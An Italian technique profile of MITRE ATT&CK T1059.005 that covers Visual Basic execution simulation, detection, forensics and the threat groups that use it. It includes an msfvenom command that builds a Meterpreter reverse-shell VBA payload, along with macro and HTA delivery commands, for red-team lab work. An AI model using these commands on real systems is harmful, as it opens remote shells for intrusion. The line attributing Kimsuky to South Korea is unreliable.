Esecuzione tramite Visual Basic: Command and Scripting Interpreter — Visual Basic (T1059.005)

La simulazione di un attacco basato su Visual Basic in laboratorio richiede di ricostruire l'intera catena: creazione del payload, delivery, esecuzione e connessione C2. Il punto di partenza è capire quali motori di scripting sono disponibili di default su un host Windows moderno e come vengono abitualmente innescati.

Esecuzione diretta di VBScript. Su qualsiasi sistema Windows 10/11, wscript.exe e cscript.exe sono presenti senza installazioni aggiuntive. Un file .vbs minimale che esegue un comando arbitrario può essere lanciato dalla riga di comando:

cscript //nologo C:\test\payload.vbs

Per simulare ciò che fanno gruppi come Gamaredon Group o RedCurl, che eseguono VBScript tramite wscript.exe, basta sostituire l'interprete:

wscript.exe C:\Users\Public\autorun.vbs

Questo schema replica il pattern di Mustang Panda, che salvava uno script autorun.vbs nella directory Startup per ottenere persistenza all'avvio.

Macro VBA in documenti Office. Per riprodurre la catena d'attacco più classica — un documento Word con macro malevola — si può creare un file .docm con una routine AutoOpen che invochi Shell() o CreateObject("WScript.Shell"). Il tool Cobalt Strike (a pagamento) include un generatore di macro VBA tramite il menu Attacks > Packages > MS Office Macro, che produce codice VBA da incollare nel Visual Basic Editor di Word o Excel. Per un'alternativa open source, Koadic (open source) offre un framework C2 interamente basato su Windows Script Host. Il suo stager genera payload VBScript eseguibili tramite mshta.exe o direttamente da cscript.exe.

HTA come vettore di delivery. SideCopy e altri gruppi hanno usato file .hta contenenti VBScript per invocare mshta.exe. La simulazione è immediata:

mshta.exe C:\test\payload.hta

L'HTA può contenere un blocco <script language="VBScript"> che esegue codice arbitrario. Questa tecnica combina T1059.005 con l'abuso di mshta come proxy di esecuzione.

Tool di generazione payload. Donut (open source) consente di generare shellcode da assembly .NET e produce output eseguibili tramite VBScript. Per la fase di encoding e offuscamento, msfvenom dal framework Metasploit (open source) può generare payload VBA:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORTA> -f vba

Un aspetto cruciale nella simulazione è il Mark-of-the-Web: su sistemi aggiornati (Office versione 2203+), le macro VBA da file scaricati da Internet sono bloccate per impostazione predefinita. Per testare l'efficacia di questo controllo, occorre verificare la presenza dell'attributo MOTW con il comando:

dir /r C:\Users<utente>\Downloads\documento.docm

cercando il flusso alternativo Zone.Identifier nell'output.

Il rilevamento dell'esecuzione Visual Basic non può basarsi sulla semplice presenza di wscript.exe o cscript.exe nei log: questi processi sono usati legitimamente da script di amministrazione, logon script di GPO e software aziendale. La chiave è la correlazione tra processo padre, contesto utente e comportamento post-esecuzione.

La catena di processo è il segnale primario. Il pattern da monitorare con priorità massima è un'applicazione Office — WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE — che genera come processo figlio wscript.exe, cscript.exe o mshta.exe. Su Sysmon, l'EventCode 1 (Process Creation) cattura questa relazione padre-figlio nel campo ParentImage. Una regola efficace filtra per ParentImage contenente i processi Office e Image corrispondente agli interpreti di scripting. Lo stesso pattern si applica a mshta.exe che genera interpreti VBS, scenario tipico degli attacchi via file HTA documentati in campagne come C0015.

Il secondo livello di detection riguarda il caricamento dei moduli. Quando un processo carica vbscript.dll o scrrun.dll (Scripting Runtime), Sysmon EventCode 7 (Image Loaded) registra l'evento. Questo è particolarmente utile per identificare processi non convenzionali che caricano il motore VBScript — un browser, un'applicazione line-of-business, o persino un eseguibile custom che incorpora il motore COM.

Per il tuning dei falsi positivi, quattro dimensioni risultano determinanti:

• Contesto utente: esecuzioni da account non amministrativi o service account meritano scrutinio aggiuntivo
• Finestra temporale: script VBS eseguiti fuori dall'orario lavorativo o dai cicli di patching indicano anomalia
• Entropia del payload: contenuto ad alta entropia nel corpo dello script suggerisce offuscamento o encoding Base64 — tecnica usata da APT37 e durante Operation CuckooBees (C0012)
• Percorso di origine: esecuzioni da %TEMP%, %APPDATA% o C:\Users\Public hanno un rapporto segnale/rumore molto più favorevole rispetto a directory di sistema

Controlli preventivi. Le regole Attack Surface Reduction (ASR) di Windows Defender, attivabili via Group Policy o Intune, offrono la protezione più immediata: la regola specifica per bloccare l'esecuzione di script VB da contenuto scaricato da Internet è attivabile su Windows 10 e successivi. Inoltre, a partire dalla versione 2203 di Office, le macro VBA in file con attributo Mark-of-the-Web vengono bloccate per impostazione predefinita — un cambiamento che ha costretto diversi gruppi APT a migrare verso vettori alternativi come file .lnk e container .iso.

Su macOS, la detection si sposta verso l'identificazione di esecuzioni VBA tramite Office for Mac o ambienti di emulazione come Wine/CrossOver. I Unified Log di macOS e osquery consentono di individuare script eseguiti da percorsi sospetti come ~/Downloads, ~/Library o /tmp/.

Ricostruire la timeline di un'intrusione basata su Visual Basic significa seguire la catena dal documento o script iniziale fino alle azioni post-esecuzione, attraverso artefatti che Windows conserva in abbondanza.

Artefatti di esecuzione. Il punto di partenza è Prefetch: i file .pf per wscript.exe, cscript.exe e mshta.exe nella directory C:\Windows\Prefetch registrano le ultime otto esecuzioni con timestamp, percorso dell'eseguibile e file referenziati. Se l'analisi rivela un file Prefetch per WSCRIPT.EXE con riferimento a un .vbs in C:\Users\Public, si ha conferma dell'esecuzione e del percorso del payload — pattern coerente con la tecnica di Mustang Panda o con i VBS dropper usati da OilRig nelle campagne Juicy Mix (C0044) e Outer Space (C0042).

Le chiavi di registro UserAssist (sotto HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist) tracciano le applicazioni lanciate tramite la shell di Explorer, incluso il doppio click su file .vbs o .hta. I valori sono codificati in ROT13 e contengono contatori di esecuzione e timestamp.

Artefatti di persistenza. Diversi gruppi — Mustang Panda, TA2541, Smoke Loader — piazzano script VBS nella directory Startup (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup). L'analisi forense deve verificare questo percorso e incrociarlo con le chiavi di registro Run e RunOnce in HKCU e HKLM. Il malware STARWHALE utilizza la funzione VBScript GetRef per agganciare la persistenza, un pattern identificabile analizzando il contenuto testuale dello script recuperato.

Timeline da log Sysmon. Gli eventi EventCode 1 permettono di ricostruire l'albero dei processi: Office → wscript.exe → powershell.exe o cmd.exe. L'EventCode 11 (FileCreate) cattura la scrittura del file .vbs su disco, mentre l'EventCode 3 (Network Connection) documenta eventuali callback C2 originati dal processo di scripting. Per la campagna 2015 Ukraine Electric Power Attack (C0028), Sandworm Team installò una macro VBA denominata vba_macro.exe che droppava il file FONTCACHE.DAT — l'impianto BlackEnergy primario — insieme a rundll32.exe, NTUSER.log e desktop.ini. Una timeline forense accurata mostrerebbe la sequenza: creazione del file macro, scrittura dei quattro artefatti droppati, esecuzione di rundll32.exe per caricare il payload.

Artefatti Office. I documenti .docm e .xlsm contengono il progetto VBA in uno stream OLE denominato vbaProject.bin, analizzabile con olevba dal pacchetto oletools (open source). Lo strumento estrae il codice macro, identifica keyword sospette come Shell, CreateObject, AutoOpen e Document_Open, e segnala indicatori di offuscamento. Per i file HTA, l'analisi del contenuto HTML/VBScript con un editor di testo è spesso sufficiente per identificare le chiamate a WScript.Shell.

Su Linux, gli artefatti sono significativamente più rari: l'esecuzione VB richiede ambienti di emulazione (Wine, Mono/.NET Core), e i log rilevanti sono quelli di auditd — in particolare le syscall execve — e i syslog che registrano l'invocazione di interpreti non standard.

Con 45 gruppi censiti, il Visual Basic è una tecnica trasversale che accomuna attori state-sponsored di primo livello e gruppi cybercriminali opportunistici. L'analisi dei pattern d'uso rivela cluster geografici e operativi ben distinti.

Cluster Medio Oriente e Asia Centrale. OilRig utilizza VBS dropper come colonna portante delle proprie operazioni, con continuità documentata dalla campagna Outer Space (C0042) nel 2021 fino a Juicy Mix (C0044) nel 2022, entrambe dirette contro organizzazioni israeliane. MuddyWater impiega VBScript per eseguire il payload POWERSTATS, usando lo script come ponte verso PowerShell. Magic Hound, APT39 e HEXANE completano un ecosistema iraniano in cui il VBScript funge da primo stadio quasi standardizzato. APT42, attore più recente nello stesso spazio, usa VBScript specificamente per interrogare i prodotti antivirus sulla vittima — un'attività di reconnaissance post-compromissione.

Cluster Asia-Pacifico. Mustang Panda rappresenta il caso d'uso più articolato: VBScript in file LNK per il download, macro VBA in documenti malevoli per l'esecuzione di DLL, e script autorun.vbs nella directory Startup per la persistenza. Tre fasi della catena coperte con lo stesso linguaggio. Lazarus Group sfrutta VBA nelle campagne Operation Dream Job (C0022) e Operation Sharpshooter (C0013), estraendo DLL con doppia codifica Base64 dalle macro. APT37 e Kimsuky, entrambi attribuiti alla Corea del Nord e alla Corea del Sud rispettivamente in ambito geopolitico, decodificano shellcode tramite VBA. APT33, nel contesto iraniano ma con targeting asiatico, usa VBScript per la delivery dei payload.

Cluster Europa orientale e operazioni distruttive. Sandworm Team ha impiegato VBScript in entrambi gli attacchi alla rete elettrica ucraina: nel 2015 (C0028) con una macro VBA che droppava BlackEnergy, e nel 2016 (C0025) con script VBS su un server SSH. Gamaredon Group, altro attore focalizzato sull'Ucraina, combina macro in template di documento con progetti VBA per Outlook e script VBS eseguiti via wscript.exe — un arsenale diversificato ma monotematico nel linguaggio. Turla utilizza VBS come componente ricorrente delle proprie operazioni, coerentemente con la preferenza per tool nativi Windows.

Cluster cybercriminale. FIN7, TA505, Cobalt Group e FIN13 dimostrano che il VBA in documenti di spearphishing resta uno standard anche per gruppi a motivazione finanziaria. TA505 in particolare ha distribuito Emotet attraverso documenti Word con macro che scaricano payload successivi. Cobalt Group si distingue per l'uso di documenti OLE compound con macro VBA offuscate, richiedendo l'interazione dell'utente per l'esecuzione.

Trend evolutivo. Il blocco delle macro VBA da file con Mark-of-the-Web introdotto da Microsoft nel 2022 ha rappresentato un punto di svolta. I gruppi più adattivi stanno migrando verso container ISO/ZIP che rimuovono l'attributo MOTW, file LNK con comandi embedded, e formati OneNote con oggetti incorporati. Tuttavia, il VBScript eseguito direttamente da wscript.exe — senza passare dal vettore Office — resta inalterato da queste restrizioni, e gruppi come Gamaredon Group, OilRig e RedCurl continuano a utilizzarlo attivamente.

Framework MITRE ATT&CK v16 — T1059.005 (Visual Basic), TA0002 (Execution). Campagne: C0025, C0028, C0022, C0007, C0001, C0024, C0015, C0014, C0013, C0011, C0016, C0012, C0044, C0006, C0042. Detection: Sysmon EventCode 1, 7, 11, 3; Prefetch; UserAssist; oletools. Integrato con conoscenza professionale per tool e procedure operative.